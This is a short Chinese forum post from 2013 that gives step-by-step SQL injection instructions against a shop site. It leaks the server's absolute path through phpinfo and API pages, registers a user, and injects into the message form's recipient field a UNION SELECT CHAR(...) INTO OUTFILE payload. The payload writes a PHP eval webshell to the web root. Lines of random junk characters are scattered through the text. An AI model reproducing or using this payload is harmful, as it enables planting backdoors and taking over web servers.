第一个:想办法找到目标网站的绝对路径
0 s, A6 \% y' @' E
3 X. [! [8 R) q2 D4 S6 [9 Phttp://www.political-security.com/install/svinfo.php?phpinfo=true
, [- o+ I9 x& c- a
1 g- h8 r `6 m4 b9 xhttp:/www.political-security.com/core/api/shop_api.php
0 v' L4 P, q! S" w5 S, `) l# u9 I$ |9 K/ T% d. l
http://www.political-security.co ... api_b2b_2_0_cat.php: G, {, C& ^/ B% Z, X
7 p6 U( t t/ u' |; Q! G
http://www.political-security.com/core/ap ... b_2_0_goodstype.php& v+ a$ z' i. ]% Z( _( @) s
+ Q0 U% F: n: Q
http://www.political-security.co ... i_b2b_2_0_brand.php) P/ m. g7 J% t. m& A0 H% J
第二个:注册一个普通用户
" m7 `1 X4 G0 \: w" _! _! ?9 @& p8 u$ T
, {" e s( N) k$ w& \http://www.political-security.com/?passport-signup.html
) S2 w2 {$ Y3 o& o8 _% o: q7 P
3 n2 }! z1 _; \6 b" r" t第三个: 发送消息 ' ~% |; S& O! }9 S/ k+ T! t8 h: j
3 x; C' m8 V$ D; I N6 o, d
http://www.political-security.com/?member-send.html
1 r/ l6 S5 }+ Z& `发送给中填写- `# g: ?* d5 n r# z* z1 @
antian365.com' union select CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php' # |
发表于 2013-2-27 21:28:28
收藏
支持
反对